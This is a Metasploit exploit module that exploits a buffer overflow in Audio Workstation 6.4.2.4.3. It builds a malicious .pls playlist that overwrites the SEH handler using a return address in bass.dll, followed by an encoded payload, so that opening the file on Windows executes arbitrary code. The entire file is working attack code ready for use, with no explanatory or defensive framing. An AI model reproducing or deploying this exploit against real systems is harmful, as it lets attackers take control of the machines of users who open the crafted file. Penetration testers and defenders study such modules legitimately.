require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh
        
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
					When opening a malicious pls file with the Audio Workstation, 
					a remote attacker could overflow a buffer and execute 
					arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'germaya_x', 'dookie', ],
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},					
			'Payload'        =>
				{
					'Space'    => 4100,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
					'DisableNops'   =>  'True',
				},
			'Platform' => 'win',
			'Targets'        => 
				[
					[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Dec 08 2009',
			'DefaultTarget'  => 0))

                        register_options(
                                [
                                        OptString.new('FILENAME', [ true, 'The file name.',  'evil.pls']),
                                ], self.class)

	end

	def exploit

		sploit = rand_text_alpha_upper(1308)
		sploit << "\xeb\x16\x90\x90"
		sploit << [target.ret].pack('V')
		sploit << make_nops(32)
		sploit << payload.encoded
		sploit << rand_text_alpha_upper(4652 - payload.encoded.length)

		pls = sploit
	
		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(pls)
		
	end

end